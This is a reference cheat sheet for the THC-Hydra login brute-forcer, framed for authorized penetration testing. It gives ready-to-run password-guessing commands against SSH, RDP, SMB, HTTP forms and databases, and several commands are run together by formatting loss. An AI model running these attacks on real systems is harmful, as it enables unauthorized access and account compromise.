Hydra Cheat Sheet
Parallelized online login brute-forcer for many protocols.
Overview
THC-Hydra performs online password guessing against network services (SSH, RDP, HTTP forms, SMB, databases, etc.). It is loud, rate-limited by targets, and often triggers lockouts or alerts. Ethics: use only on systems and accounts covered by written authorization; unauthorized login attempts are illegal. Prefer credential stuffing with known leaks in labs only when scope allows.
Install
sudo apt install hydrahydra -hEssential commands
hydra -l admin -P passwords.txt ssh://10.10.10.5hydra -L users.txt -p 'Password1!' rdp://10.10.10.10hydra -l user -P pass.txt 10.10.10.20 http-post-form "/login:user=^USER^&pass=^PASS^:F=invalid"Common workflows
SSH —
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.5 -t 4 -fhydra -L users.txt -P pass.txt ssh://target -o hydra_ssh.txtSMB / RDP —
hydra -L users.txt -P passwords.txt smb://10.10.10.5hydra -l administrator -P pass.txt rdp://10.10.10.10 -t 1HTTP POST form —
hydra -l admin -P pass.txt 10.10.10.20 http-post-form"/login.php:username=^USER^&password=^PASS^:F=Login failed"HTTP basic / digest —
hydra -L users.txt -P pass.txt 10.10.10.20 http-get /hydra -l user -P pass.txt 10.10.10.20 http-head /admin/Database —
hydra -l sa -P pass.txt mssql://10.10.10.30hydra -l postgres -P pass.txt postgres://10.10.10.30Flags reference
-l / -L | Single user / user list |
|---|---|
-p / -P | Single pass / wordlist |
-t | Parallel tasks |
-f | Exit on first match |
-V | Verbose each attempt |
-o | Output file |
-s | Port (if non-default) |
-w | Wait between tries (seconds) |
Tips
- Ethics: throttle (-t, -w), use dedicated lab VMs, and stop on lockout policies—never spray production without approval.
- HTTP forms need exact failure string (F=) or success (S=) from a failed login response.
- Try one known-good password first to validate module syntax before full wordlists.
- For AD, prefer netexec/kerbrute with proper auth workflows over blind Hydra on domain controllers.